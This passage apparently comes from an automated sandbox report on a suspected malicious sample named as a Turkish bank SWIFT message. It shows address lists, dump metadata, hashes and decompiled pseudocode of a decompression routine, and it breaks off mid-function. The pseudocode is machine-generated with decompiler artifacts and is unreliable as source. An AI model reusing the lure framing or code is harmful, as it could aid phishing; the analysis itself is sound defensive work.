                                  0x0040669c
                                  0x00000000
                                  0x00000000
                                  0x00406830
                                  0x00406830
                                  0x00406833
                                  0x00406734
                                  0x00406734
                                  0x00406734
                                  0x00000000
                                  0x0040673a
                                  0x00000000
                                  0x0040646a
                                  0x0040646a
                                  0x0040646c
                                  0x00406473
                                  0x00406474
                                  0x00406476
                                  0x00406479
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040677d
                                  0x0040677d
                                  0x00406780
                                  0x00406787
                                  0x00000000
                                  0x0040678a
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004064af
                                  0x004064af
                                  0x004064b2
                                  0x004064e8
                                  0x004064e8
                                  0x00406618
                                  0x00406618
                                  0x00406618
                                  0x00406618
                                  0x0040661b
                                  0x0040661b
                                  0x0040661e
                                  0x00406620
                                  0x004068aa
                                  0x004068aa
                                  0x00000000
                                  0x004068aa
                                  0x00406626
                                  0x00406626
                                  0x00406629
                                  0x00000000
                                  0x00000000
                                  0x0040662f
                                  0x0040662f
                                  0x00406633
                                  0x00406636
                                  0x00406636
                                  0x00406636
                                  0x00000000
                                  0x00406636
                                  0x004064b4
                                  0x004064b4
                                  0x004064b6
                                  0x004064b8
                                  0x004064ba
                                  0x004064bd
                                  0x004064be
                                  0x004064c0
                                  0x004064c2
                                  0x004064c5
                                  0x004064c8
                                  0x004064de
                                  0x004064de
                                  0x004064e3
                                  0x0040651b
                                  0x0040651b
                                  0x0040651f
                                  0x00406548
                                  0x0040654b
                                  0x0040654d
                                  0x00406554
                                  0x00406557
                                  0x0040655a
                                  0x0040655a
                                  0x0040655f
                                  0x0040655f
                                  0x00406561
                                  0x00406564
                                  0x0040656b
                                  0x0040656e
                                  0x0040659b
                                  0x0040659b
                                  0x0040659e
                                  0x004065a1
                                  0x00406615
                                  0x00406615
                                  0x00406615
                                  0x00406615
                                  0x00000000
                                  0x00406615
                                  0x004065a3
                                  0x004065a3
                                  0x004065a9
                                  0x004065ac
                                  0x004065af
                                  0x004065b2
                                  0x004065b5
                                  0x004065b8
                                  0x004065bb
                                  0x004065be
                                  0x004065c1
                                  0x004065c4
                                  0x004065dd
                                  0x004065df
                                  0x004065e2
                                  0x004065e3
                                  0x004065e6
                                  0x004065e8
                                  0x004065eb
                                  0x004065ed
                                  0x004065ef
                                  0x004065f2
                                  0x004065f4
                                  0x004065f7
                                  0x004065fb
                                  0x004065fd
                                  0x004065fd
                                  0x004065fe
                                  0x00406601
                                  0x00406604
                                  0x004065c6
                                  0x004065c6
                                  0x004065ce
                                  0x004065d3
                                  0x004065d5
                                  0x004065d8
                                  0x004065d8
                                  0x00406607
                                  0x0040660e
                                  0x00406598
                                  0x00406598
                                  0x00406598
                                  0x00406598
                                  0x00000000
                                  0x00406610
                                  0x00406610
                                  0x00000000
                                  0x00406610
                                  0x0040660e
                                  0x00406521
                                  0x00406521
                                  0x00406524
                                  0x00406526
                                  0x00406529
                                  0x0040652c
                                  0x0040652f
                                  0x00406531
                                  0x00406534
                                  0x00406537
                                  0x00406537
                                  0x0040653a
                                  0x0040653a
                                  0x0040653d
                                  0x00406544
                                  0x00406518
                                  0x00406518
                                  0x00406518
                                  0x00406518
                                  0x00000000
                                  0x00406546
                                  0x00406546
                                  0x00000000
                                  0x00406546
                                  0x00406544
                                  0x004064ca
                                  0x004064ca
                                  0x004064cd
                                  0x004064cf
                                  0x004064d2
                                  0x00000000
                                  0x00000000
                                  0x00406231
                                  0x00406231
                                  0x00406235
                                  0x0040687a
                                  0x0040687a
                                  0x00000000
                                  0x0040687a
                                  0x0040623b
                                  0x0040623b
                                  0x0040623e
                                  0x00406241
                                  0x00406244
                                  0x00406247
                                  0x0040624a
                                  0x0040624d
                                  0x0040624f
                                  0x00406252
                                  0x00406255
                                  0x00406258
                                  0x0040625a
                                  0x0040625a
                                  0x0040625a
                                  0x00000000
                                  0x00000000
                                  0x004063bc
                                  0x004063bc
                                  0x004063c0
                                  0x00406886
                                  0x00406886
                                  0x00000000
                                  0x00406886
                                  0x004063c6
                                  0x004063c6
                                  0x004063c9
                                  0x004063cc
                                  0x004063cf
                                  0x004063d1
                                  0x004063d1
                                  0x004063d1
                                  0x004063d4
                                  0x004063d7
                                  0x004063da
                                  0x004063dd
                                  0x004063e0
                                  0x004063e3
                                  0x004063e4
                                  0x004063e6
                                  0x004063e6
                                  0x004063e6
                                  0x004063e9
                                  0x004063ec
                                  0x004063ef
                                  0x004063f2
                                  0x004063f2
                                  0x004063f2
                                  0x004063f5
                                  0x004063f7
                                  0x004063f7
                                  0x00000000
                                  0x00000000
                                  0x00406639
                                  0x00406639
                                  0x00406639
                                  0x0040663d
                                  0x00000000
                                  0x00000000
                                  0x00406643
                                  0x00406643
                                  0x00406646
                                  0x00406649
                                  0x0040664c
                                  0x0040664e
                                  0x0040664e
                                  0x0040664e
                                  0x00406651
                                  0x00406654
                                  0x00406657
                                  0x0040665a
                                  0x0040665d
                                  0x00406660
                                  0x00406661
                                  0x00406663
                                  0x00406663
                                  0x00406663
                                  0x00406666
                                  0x00406669
                                  0x0040666c
                                  0x0040666f
                                  0x00406672
                                  0x00406676
                                  0x00406678
                                  0x0040667b
                                  0x00000000
                                  0x0040667d
                                  0x0040667d
                                  0x004063fa
                                  0x004063fa
                                  0x00000000
                                  0x004063fa
                                  0x0040667b
                                  0x004068b0
                                  0x004068b0
                                  0x00000000
                                  0x00000000
                                  0x00405edf
                                  0x004068e7
                                  0x004068e7
                                  0x00000000
                                  0x004068e7
                                  0x00406734
                                  0x004067b4
                                  0x0040677d

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.293204636.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.293198616.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293230556.0000000000407000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293256524.0000000000409000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293314414.0000000000422000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293341301.0000000000429000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293356616.000000000042C000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4704a5ed105780f6478b7403eb4dd8ec19d01cc9a077ced7c1a67cf9ab5ccc14
                                  • Instruction ID: 5ae99ca79f71cc2638d3baaeb57d6c4ee888c8cbc78e3ce5cc4ffc2d3191f51a
                                  • Opcode Fuzzy Hash: 4704a5ed105780f6478b7403eb4dd8ec19d01cc9a077ced7c1a67cf9ab5ccc14
                                  • Instruction Fuzzy Hash: 1FA13571D00229CBDF28CFA8C854BADBBB1FF44305F15816AD816BB281D7785A86DF44
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 98%
                                  			E00406682() {
                                  				void _t533;
                                  				signed int _t534;
                                  				signed int _t535;
                                  				signed int* _t605;
                                  				void* _t612;
                                  
                                  				L0:
                                  				while(1) {
                                  					L0:
                                  					if( *(_t612 - 0x40) != 0) {
                                  						 *(_t612 - 0x84) = 0x13;
                                  						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
                                  						goto L132;
                                  					} else {
                                  						__eax =  *(__ebp - 0x4c);
                                  						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                  						__ecx =  *(__ebp - 0x58);
                                  						__eax =  *(__ebp - 0x4c) << 4;
                                  						__eax =  *(__ebp - 0x58) + __eax + 4;
                                  						L130:
                                  						 *(__ebp - 0x58) = __eax;
                                  						 *(__ebp - 0x40) = 3;
                                  						L144:
                                  						 *(__ebp - 0x7c) = 0x14;
                                  						L145:
                                  						__eax =  *(__ebp - 0x40);
                                  						 *(__ebp - 0x50) = 1;
                                  						 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                  						L149:
                                  						if( *(__ebp - 0x48) <= 0) {
                                  							__ecx =  *(__ebp - 0x40);
                                  							__ebx =  *(__ebp - 0x50);
                                  							0 = 1;
                                  							__eax = 1 << __cl;
                                  							__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                  							__eax =  *(__ebp - 0x7c);
                                  							 *(__ebp - 0x44) = __ebx;
                                  							while(1) {
                                  								L140:
                                  								 *(_t612 - 0x88) = _t533;
                                  								while(1) {
                                  									L1:
                                  									_t534 =  *(_t612 - 0x88);
                                  									if(_t534 > 0x1c) {
                                  										break;
                                  									}
                                  									switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
                                  										case 0:
                                  											if( *(_t612 - 0x6c) == 0) {
                                  												goto L170;
                                  											}
                                  											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                  											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                  											_t534 =  *( *(_t612 - 0x70));
                                  											if(_t534 > 0xe1) {
                                  												goto L171;
                                  											}
                                  											_t538 = _t534 & 0x000000ff;
                                  											_push(0x2d);
                                  											asm("cdq");
                                  											_pop(_t569);
                                  											_push(9);
                                  											_pop(_t570);
                                  											_t608 = _t538 / _t569;
                                  											_t540 = _t538 % _t569 & 0x000000ff;
                                  											asm("cdq");
                                  											_t603 = _t540 % _t570 & 0x000000ff;
                                  											 *(_t612 - 0x3c) = _t603;
                                  											 *(_t612 - 0x1c) = (1 << _t608) - 1;
                                  											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
                                  											_t611 = (0x300 << _t603 + _t608) + 0x736;
                                  											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
                                  												L10:
                                  												if(_t611 == 0) {
                                  													L12:
                                  													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
                                  													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                                  													goto L15;
                                  												} else {
                                  													goto L11;
                                  												}
                                  												do {
                                  													L11:
                                  													_t611 = _t611 - 1;
                                  													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
                                  												} while (_t611 != 0);
                                  												goto L12;
                                  											}
                                  											if( *(_t612 - 4) != 0) {
                                  												GlobalFree( *(_t612 - 4));
                                  											}
                                  											_t534 = GlobalAlloc(0x40, 0x600); // executed
                                  											 *(_t612 - 4) = _t534;
                                  											if(_t534 == 0) {
                                  												goto L171;
                                  											} else {
                                  												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
                                  												goto L10;
                                  											}
                                  										case 1:
                                  											L13:
                                  											__eflags =  *(_t612 - 0x6c);
                                  											if( *(_t612 - 0x6c) == 0) {
                                  												 *(_t612 - 0x88) = 1;
                                  												goto L170;
                                  											}
                                  											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                  											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
                                  											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                  											_t45 = _t612 - 0x48;
                                  											 *_t45 =  *(_t612 - 0x48) + 1;
                                  											__eflags =  *_t45;
                                  											L15:
                                  											if( *(_t612 - 0x48) < 4) {
                                  												goto L13;
                                  											}
                                  											_t546 =  *(_t612 - 0x40);
                                  											if(_t546 ==  *(_t612 - 0x74)) {
                                  												L20:
                                  												 *(_t612 - 0x48) = 5;
                                  												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
                                  												goto L23;
                                  											}
                                  											 *(_t612 - 0x74) = _t546;
                                  											if( *(_t612 - 8) != 0) {
                                  												GlobalFree( *(_t612 - 8));
                                  											}
                                  											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
                                  											 *(_t612 - 8) = _t534;
                                  											if(_t534 == 0) {
                                  												goto L171;
                                  											} else {
                                  												goto L20;
                                  											}
                                  										case 2:
                                  											L24:
                                  											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
                                  											 *(_t612 - 0x84) = 6;
                                  											 *(_t612 - 0x4c) = _t553;
                                  											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
                                  											goto L132;
                                  										case 3:
                                  											L21:
                                  											__eflags =  *(_t612 - 0x6c);
                                  											if( *(_t612 - 0x6c) == 0) {
                                  												 *(_t612 - 0x88) = 3;
                                  												goto L170;
                                  											}
                                  											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                  											_t67 = _t612 - 0x70;
                                  											 *_t67 =  &(( *(_t612 - 0x70))[1]);
                                  											__eflags =  *_t67;
                                  											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                                  											L23:
                                  											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
                                  											if( *(_t612 - 0x48) != 0) {
                                  												goto L21;
                                  											}
                                  											goto L24;
                                  										case 4:
                                  											L133:
                                  											_t531 =  *_t605;
                                  											_t588 = _t531 & 0x0000ffff;
                                  											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
                                  											if( *(_t612 - 0xc) >= _t564) {
                                  												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
                                  												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
                                  												 *(_t612 - 0x40) = 1;
                                  												_t532 = _t531 - (_t531 >> 5);
                                  												__eflags = _t532;
                                  												 *_t605 = _t532;
                                  											} else {
                                  												 *(_t612 - 0x10) = _t564;
                                  												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                                  												 *_t605 = (0x800 - _t588 >> 5) + _t531;
                                  											}
                                  											if( *(_t612 - 0x10) >= 0x1000000) {
                                  												goto L139;
                                  											} else {
                                  												goto L137;
                                  											}
                                  										case 5:
                                  											L137:
                                  											if( *(_t612 - 0x6c) == 0) {
                                  												 *(_t612 - 0x88) = 5;
                                  												goto L170;
                                  											}
                                  											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
                                  											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                  											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                  											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                                  											L139:
                                  											_t533 =  *(_t612 - 0x84);
                                  											goto L140;
                                  										case 6:
                                  											__edx = 0;
                                  											__eflags =  *(__ebp - 0x40);
                                  											if( *(__ebp - 0x40) != 0) {
                                  												__eax =  *(__ebp - 4);
                                  												__ecx =  *(__ebp - 0x38);
                                  												 *(__ebp - 0x34) = 1;
                                  												 *(__ebp - 0x84) = 7;
                                  												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                  												goto L132;
                                  											}
                                  											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                  											__esi =  *(__ebp - 0x60);
                                  											__cl = 8;
                                  											__cl = 8 -  *(__ebp - 0x3c);
                                  											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                  											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                  											__ecx =  *(__ebp - 0x3c);
                                  											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                  											__ecx =  *(__ebp - 4);
                                  											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                  											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                  											__eflags =  *(__ebp - 0x38) - 4;
                                  											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                  											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                  											if( *(__ebp - 0x38) >= 4) {
                                  												__eflags =  *(__ebp - 0x38) - 0xa;
                                  												if( *(__ebp - 0x38) >= 0xa) {
                                  													_t98 = __ebp - 0x38;
                                  													 *_t98 =  *(__ebp - 0x38) - 6;
                                  													__eflags =  *_t98;
                                  												} else {
                                  													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                  												}
                                  											} else {
                                  												 *(__ebp - 0x38) = 0;
                                  											}
                                  											__eflags =  *(__ebp - 0x34) - __edx;
                                  											if( *(__ebp - 0x34) == __edx) {
                                  												__ebx = 0;
                                  												__ebx = 1;
                                  												goto L61;
                                  											} else {
                                  												__eax =  *(__ebp - 0x14);
                                  												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                  												__eflags = __eax -  *(__ebp - 0x74);
                                  												if(__eax >=  *(__ebp - 0x74)) {
                                  													__eax = __eax +  *(__ebp - 0x74);
                                  													__eflags = __eax;
                                  												}
                                  												__ecx =  *(__ebp - 8);
                                  												__ebx = 0;
                                  												__ebx = 1;
                                  												__al =  *((intOrPtr*)(__eax + __ecx));
                                  												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                  												goto L41;
                                  											}
                                  										case 7:
                                  											__eflags =  *(__ebp - 0x40) - 1;
                                  											if( *(__ebp - 0x40) != 1) {
                                  												__eax =  *(__ebp - 0x24);
                                  												 *(__ebp - 0x80) = 0x16;
                                  												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                  												__eax =  *(__ebp - 0x28);
                                  												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                  												__eax =  *(__ebp - 0x2c);
                                  												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                  												__eax = 0;
                                  												__eflags =  *(__ebp - 0x38) - 7;
                                  												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                  												__al = __al & 0x000000fd;
                                  												__eax = (__eflags >= 0) - 1 + 0xa;
                                  												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                  												__eax =  *(__ebp - 4);
                                  												__eax =  *(__ebp - 4) + 0x664;
                                  												__eflags = __eax;
                                  												 *(__ebp - 0x58) = __eax;
                                  												goto L69;
                                  											}
                                  											__eax =  *(__ebp - 4);
                                  											__ecx =  *(__ebp - 0x38);
                                  											 *(__ebp - 0x84) = 8;
                                  											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                  											goto L132;
                                  										case 8:
                                  											__eflags =  *(__ebp - 0x40);
                                  											if( *(__ebp - 0x40) != 0) {
                                  												__eax =  *(__ebp - 4);
                                  												__ecx =  *(__ebp - 0x38);
                                  												 *(__ebp - 0x84) = 0xa;
                                  												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                  											} else {
                                  												__eax =  *(__ebp - 0x38);
                                  												__ecx =  *(__ebp - 4);
                                  												__eax =  *(__ebp - 0x38) + 0xf;
                                  												 *(__ebp - 0x84) = 9;
                                  												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                  												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                  											}
                                  											goto L132;
                                  										case 9:
                                  											__eflags =  *(__ebp - 0x40);
                                  											if( *(__ebp - 0x40) != 0) {
                                  												goto L90;
                                  											}
                                  											__eflags =  *(__ebp - 0x60);
                                  											if( *(__ebp - 0x60) == 0) {
                                  												goto L171;
                                  											}
                                  											__eax = 0;
                                  											__eflags =  *(__ebp - 0x38) - 7;
                                  											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                  											__eflags = _t259;
                                  											0 | _t259 = _t259 + _t259 + 9;
                                  											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                  											goto L76;
                                  										case 0xa:
                                  											__eflags =  *(__ebp - 0x40);
                                  											if( *(__ebp - 0x40) != 0) {
                                  												__eax =  *(__ebp - 4);
                                  												__ecx =  *(__ebp - 0x38);
                                  												 *(__ebp - 0x84) = 0xb;
                                  												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                  												goto L132;
                                  											}
                                  											__eax =  *(__ebp - 0x28);
                                  											goto L89;
                                  										case 0xb:
                                  											__eflags =  *(__ebp - 0x40);
                                  											if( *(__ebp - 0x40) != 0) {
                                  												__ecx =  *(__ebp - 0x24);
                                  												__eax =  *(__ebp - 0x20);
                                  												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                  											} else {
                                  												__eax =  *(__ebp - 0x24);
                                  											}
                                  											__ecx =  *(__ebp - 0x28);
                                  											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                  											L89:
                                  											__ecx =  *(__ebp - 0x2c);
                                  											 *(__ebp - 0x2c) = __eax;
                                  											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                  											L90:
                                  											__eax =  *(__ebp - 4);
                                  											 *(__ebp - 0x80) = 0x15;
                                  											__eax =  *(__ebp - 4) + 0xa68;
                                  											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                  											goto L69;
                                  										case 0xc:
                                  											L100:
                                  											__eflags =  *(__ebp - 0x6c);
                                  											if( *(__ebp - 0x6c) == 0) {
                                  												 *(__ebp - 0x88) = 0xc;
                                  												goto L170;
                                  											}
                                  											__ecx =  *(__ebp - 0x70);
                                  											__eax =  *(__ebp - 0xc);
                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											_t335 = __ebp - 0x70;
                                  											 *_t335 =  *(__ebp - 0x70) + 1;
                                  											__eflags =  *_t335;
                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											__eax =  *(__ebp - 0x2c);
                                  											goto L102;
                                  										case 0xd:
                                  											L37:
                                  											__eflags =  *(__ebp - 0x6c);
                                  											if( *(__ebp - 0x6c) == 0) {
                                  												 *(__ebp - 0x88) = 0xd;
                                  												goto L170;
                                  											}
                                  											__ecx =  *(__ebp - 0x70);
                                  											__eax =  *(__ebp - 0xc);
                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											_t122 = __ebp - 0x70;
                                  											 *_t122 =  *(__ebp - 0x70) + 1;
                                  											__eflags =  *_t122;
                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											L39:
                                  											__eax =  *(__ebp - 0x40);
                                  											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                  											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                  												goto L48;
                                  											}
                                  											__eflags = __ebx - 0x100;
                                  											if(__ebx >= 0x100) {
                                  												goto L54;
                                  											}
                                  											L41:
                                  											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                  											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                  											__ecx =  *(__ebp - 0x58);
                                  											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                  											 *(__ebp - 0x48) = __eax;
                                  											__eax = __eax + 1;
                                  											__eax = __eax << 8;
                                  											__eax = __eax + __ebx;
                                  											__esi =  *(__ebp - 0x58) + __eax * 2;
                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                  											__ax =  *__esi;
                                  											 *(__ebp - 0x54) = __esi;
                                  											__edx = __ax & 0x0000ffff;
                                  											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                  											__eflags =  *(__ebp - 0xc) - __ecx;
                                  											if( *(__ebp - 0xc) >= __ecx) {
                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                  												__cx = __ax;
                                  												 *(__ebp - 0x40) = 1;
                                  												__cx = __ax >> 5;
                                  												__eflags = __eax;
                                  												__ebx = __ebx + __ebx + 1;
                                  												 *__esi = __ax;
                                  											} else {
                                  												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                  												 *(__ebp - 0x10) = __ecx;
                                  												0x800 = 0x800 - __edx;
                                  												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                  												__ebx = __ebx + __ebx;
                                  												 *__esi = __cx;
                                  											}
                                  											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                  											 *(__ebp - 0x44) = __ebx;
                                  											if( *(__ebp - 0x10) >= 0x1000000) {
                                  												goto L39;
                                  											} else {
                                  												goto L37;
                                  											}
                                  										case 0xe:
                                  											L46:
                                  											__eflags =  *(__ebp - 0x6c);
                                  											if( *(__ebp - 0x6c) == 0) {
                                  												 *(__ebp - 0x88) = 0xe;
                                  												goto L170;
                                  											}
                                  											__ecx =  *(__ebp - 0x70);
                                  											__eax =  *(__ebp - 0xc);
                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											_t156 = __ebp - 0x70;
                                  											 *_t156 =  *(__ebp - 0x70) + 1;
                                  											__eflags =  *_t156;
                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											while(1) {
                                  												L48:
                                  												__eflags = __ebx - 0x100;
                                  												if(__ebx >= 0x100) {
                                  													break;
                                  												}
                                  												__eax =  *(__ebp - 0x58);
                                  												__edx = __ebx + __ebx;
                                  												__ecx =  *(__ebp - 0x10);
                                  												__esi = __edx + __eax;
                                  												__ecx =  *(__ebp - 0x10) >> 0xb;
                                  												__ax =  *__esi;
                                  												 *(__ebp - 0x54) = __esi;
                                  												__edi = __ax & 0x0000ffff;
                                  												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                  												__eflags =  *(__ebp - 0xc) - __ecx;
                                  												if( *(__ebp - 0xc) >= __ecx) {
                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                  													__cx = __ax;
                                  													_t170 = __edx + 1; // 0x1
                                  													__ebx = _t170;
                                  													__cx = __ax >> 5;
                                  													__eflags = __eax;
                                  													 *__esi = __ax;
                                  												} else {
                                  													 *(__ebp - 0x10) = __ecx;
                                  													0x800 = 0x800 - __edi;
                                  													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                  													__ebx = __ebx + __ebx;
                                  													 *__esi = __cx;
                                  												}
                                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                  												 *(__ebp - 0x44) = __ebx;
                                  												if( *(__ebp - 0x10) >= 0x1000000) {
                                  													continue;
                                  												} else {
                                  													goto L46;
                                  												}
                                  											}
                                  											L54:
                                  											_t173 = __ebp - 0x34;
                                  											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                  											__eflags =  *_t173;
                                  											goto L55;
                                  										case 0xf:
                                  											L58:
                                  											__eflags =  *(__ebp - 0x6c);
                                  											if( *(__ebp - 0x6c) == 0) {
                                  												 *(__ebp - 0x88) = 0xf;
                                  												goto L170;
                                  											}
                                  											__ecx =  *(__ebp - 0x70);
                                  											__eax =  *(__ebp - 0xc);
                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											_t203 = __ebp - 0x70;
                                  											 *_t203 =  *(__ebp - 0x70) + 1;
                                  											__eflags =  *_t203;
                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											L60:
